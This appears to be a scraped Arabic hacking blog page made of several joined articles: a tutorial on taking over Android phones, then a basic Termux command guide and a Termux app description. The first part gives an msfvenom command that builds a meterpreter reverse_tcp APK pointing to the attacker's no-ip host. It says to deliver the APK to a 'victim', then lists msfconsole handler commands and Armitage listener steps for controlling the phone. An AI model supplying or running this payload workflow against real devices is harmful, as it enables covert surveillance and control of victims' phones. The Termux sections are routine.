تختار البايلود الاتي android/meterpreter/reverse_tcp وهو أنواع كثيرة, لكننا اخترنا البايلود meterpreter لانه يتحكم بالضحية بشكل كامل وأوامره كثيرة (هو أفضل بايلود), ونوعه reverce_tcp بمعنى أن السيرفر الذي زرعناه في هاتف الضحية هو من يتصل بي (أنا الهكر), ولهذا يسمى عكسي reverse
  • البورت LPORT : وقمنا بوضع البورت 4444 أنت استبدله بأي بورت يكون مفتوح بالروتر عندك مثلا بورت 443 او 8181 ...
  • LHOST : هنا تضع الايبي الخاص بجهازك, حتى يتصل بك الضحية (هو من ينشئ الاتصال)
  • لمعرفة الايبي الداخلي الخاص بك افتح الطرفية واكتب الأمر
ifconfig
ifconfig
مثلا في جهازي كما بالصورة 192.168.1.14
تنويه: ان كان ضحيتك خارج الشبكة فاستعمل الايبي الخارجي, أو استعمل موقع نو ايبي لتثبيت الايبي

وهذا اسم ومسار البايلود في جهازك
/root/Desktop/server.apk 

الان تقوم بتمرير الملف الناتج server.apk الى جهاز الضحية وتشغله فيتم الاختراق.
نأتي الان لمرحلة التحكم بالضحية, يمكننا التحكم بالضحية بطريقتين

1.عن طريق الاوامر CL بواسطة Metasploit أو بشكل أدق اداة msfconsole
انسخ الأوامر بالطرفية:
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 4444
exploit
2.الطريقة الثانية أسهل بكثير, وهي التحكم بواسطة الارميتاج Armitage وهي تعتمد على الواجهة الرسومية GUI
تنشيء جلسة التنصت كالاتي:
  1. افتح الطرفية Terminal
  2. أكتب 
armitage
ستفتح الارميتاج
اختراق الاندرويد بواسطة البايلود armitage
اختر Listeners بمعنى تنصت
/
ثم حدد البورت 4444 والبايلود  meterpreter
listener

ثم STart Listener

start listener armitage
في الاخير عند اشتغال البايلود في هاتف الضحية سيضهر لك على شاشة الارميتاج
ملحوظة 
للاختراق خارج الشبكة يجب عليك استبدال الاي بي LHOST الى عنوان النو ايبي no-ip الخاص بك
كمثال بهذا الشكل:
msfvenom -p android/meterpreter/reverse_tcp LHOST=cortexhacker.no-ip.biz LPORT=4444 R > /root/Desktop/server.apk

اهم اوامر تطبيق تارمكس Termux

0
اهم اوامر تطبيق Termux

اهم اوامر تطبيق تارمكس Termux 

termux هو تطبيق سطر اوامر CL وهو شبيه بالترمينال او الطرفية الموجودة على نظام لينكس, والسبب أن نفس اوامر اللينكس تعمل على Termux, سأتطرق لاهم الأوامر الضرورية في موضوعنا هذا.

أهم أوامر Termux

في الواقع يمكنك استعمال العديد من اوامر لينكس الاعتيادية على تطبيق Termux، ومن اهم هذه الاوامر نمثل:
الانتقال بين المجلدات والتعديل على الملفات،  ستحتاجها بالتأكيد للتعامل مع النظام .
ملاحظة: الأوامر يجب ان تكون بالحروف الصغيرة لأنها حساسة لحالة الاحرف small letters.


أولا وقبل كل شيء يجب أن تتعرف على طريقة تحديث الطرفية Termux وكيفية تثبيت الادوات عليها

طريقة تحديث وترقية الاداة Termux

امر التحديث
pkg update
امر الترقية
pkg upgrade

تثبيت البرامج على Termux 


لتثبيت برنامج معين نستعمل الامر pkg ثم install بعدها اسم البرنامج المراد تثبيته,
مثال:

pkg install [اسم البرنامج المراد تثبيته]
 مثال نقوم بتثبيت برنامج wget  (هو برنامج تحميل ملفات بدون واجهة رسومية)
pkg install wget
طريقة الغاء التثبيت
نستعمل الامر uninstall
pkg uninstall wget
لمعرفة البرامج الموجودة بالمستودع pkg في حالة اردت تقثبيت برنامج معين تبحث عنه, أكتب الامر الأتي

pkg list-all

اوامر التعامل مع الملفات والنظام

الامر cd

الأمر "cd" يستعمل للانتقال الى مجلد معين، على سبيل المثال ، إذا كنت في المجلد الرئيسي Home، وتريد الانتقال إلى مجلد التحميلات، يمكنك كتابة

 cd Downloads

على فرض ان Download هو اسم المجلد المراد الدخول اليه.

 الامر ls

يستخدم اﻷمر ls لعرض الملفات والمجلدات الموجودة في المجلد المطلوب؛ قم بكتابة اﻷمر ls في الطرفية لديك وسوف يعرض لك قائمة بالملفات والمجلدات المتواجدة في مجلد المنزل (Home)
ويمكنك اظهار اسماء الملفات المخفية باستخدام الأمر "ls -a".
ls -a

الامر pwd

pwd - هذا الامر يعرض لك مسار المجلد الذي انت متواجد فيه حاليا،

pwd

الامر mkdir

نستخدم الامر mkdir والذي يعني make directory بمعنى انشاء مجلد, مثال

mkdir myfolder
هنا قمنا بإنشاء مجلد باسم myfolder.

الامر rmdir و rm

لحذف مجلد نستعمل الامر rmdir بمعنى remove directory ولحذف ملف نستعمل الامر rm
مثال:
حذف مجلد myfolder
rmdir myfolder
حذف ملف
rm myimage.jpg
على فرض أن myimage.jpg  ملف صورة.

الأمر touch

يتم استخدام الأمر touch لإنشاء ملف جديد سواء كان ملف نصي txt فارغ او ملف doc فارغ. على سبيل المثال:
touch log.txt

 الأمر cat

نستخدم الامر cat لعرض محتويات ملف معين وليكن مثل الملف الذي أنشأناه سابقا مثال.
cat log.txt

الأمر cp 

استخدم الأمر cp لنسخ الملفات من مجلد الى آخر. يحتاج الأمر إلى متغيرين: الأول هو مسار الملف المراد نسخه والثاني هو المجلد الهدف المراد نسخ الملف داخله.
مثال سننسخ ملف موجود بالتحميلات Downloads ونضعه في مجلد الرئيس الهوم Home
cp /Downloads/onsec.jpg /Home/onsec.jpg

الأمر mv 

استخدم الأمر mv لنقل الملفات عبر سطر الأوامر. يمكننا أيضًا استخدام الأمر mv لإعادة تسمية الملفات. على سبيل المثال، إذا أردنا إعادة تسمية ملف "text" الى ملف "new" ، يمكننا استخدام الامر "mv old new" ولنقلها نستعمل نفس طريقة النسخ
mv oldName newName

 الأمر echo

يستخدم لطباعة اي كتابة على الطرفية مثال echo Hello CortexHacker واذا أردنا كتابتها داخل ملف نستخدم السهم < على سبيل المثال
echo Hello > file.txt
 قمنا بكتابة كلمة Hello في ملف اسميناه file.txt اذا كان الملف غير موجود سيتم انشاءه تلقائيا.
اما اذا اردت اضافة كلمة الى ملف موجود نستخدم السهمين << مثال
echo World  >> file.txt

الأمر nano و vi

تستطيع ان تعتبرهما محرر نصوص مثل notepad تتمكن من خلاله من تعديل او تحرير ملف نصي عن طريق كتابة اسم الاداة وتمرر لها مسار الملف المراد فتحه والتعديل عليه مثال
nano /Downloads/site.txt

الأمر zip و unzip

استخدم الامر zip لضغط الملفات في أرشيف مضغوط ، و unzip لفك الضغط واستخراج الملفات من الأرشيف المضغوط يمكن ان لا يعمل الامر في البداية ويظهر command not found والسبب انه لا يأتي افتراضيا بل تقوم بتثبيته اولا عبر الامر
pkg install zip
 اذا أردت فك ضغط عن ملف استعمل الامر unzip ومرر له مسار الملف المضغوط
مثال:
unzip /Downloads/cortexhacker.zip

 الأمر help

هذا الامر مهم جدا فعند كتابته يعطيك كل أوامر النظام في حالة نسيت أمر معين ستجده وأمامه شرح بسيط عن دوره
help

يمكنك البحث أكثر واستعمال اوامر اللينكس فهي تعمل على Termux بشكل طبيعي, ويمكنك أيضا تثبيت برامج أخرى
على سبيل المثال يمكنك تثبيت جميع برامج الكالي لينكس, وقد تطرقت سابقا لهذا الموضوع

تثبيت تطبيق تارموكس محاكي طرفية اللينكس على هواتف الاندرويد

0
تطبيق تارموكس محاكي طرفية اللينكس على هواتف الاندرويد

ماهو Termux

هو محاكي طرفية اللينكس على نظام الأندرويد والكروم بوك, تمكنك من من تثبيت أدوات كالي لينكس بسهولة ودون الحاجة صلاحيات الروت. ويوجد به حزم إضافية يتم تثبيتها باستخدام مدير الحزم apt.
في هذا المقال سنتعرف على تطبيق تارموكس أول وأفضل تطبيق هواتف أندرويد لتقديم ميزات الطرفية الموجودة في جميع أنظمة اللينكس، تطبيق تارموكس عبارة عن أداة تشبه الدوس في الويندوز بها شاشة سوداء وعليها كتابة بيضاء مستوحات من أنظمة الهكر مثل لينكس.

اضافات تارموكس

Termux has some extra features. You can add them by installing addons:
Termux:API
Access Android and Chrome hardware features.
Termux:Boot
Run script(s) when your device boots.
Termux:Float
Run Termux in a floating window.
Termux:Styling
Have color schemes and powerline-ready fonts customize the appearance of the Termux terminal.
Termux:Task
An easy way to call Termux executables from Tasker and compatible apps.
Termux:Widget
Start small scriptlets from the home screen.

Google Play - للتحميل من 

termux-wikikali
من هنا ⇙
Termux - Google-Play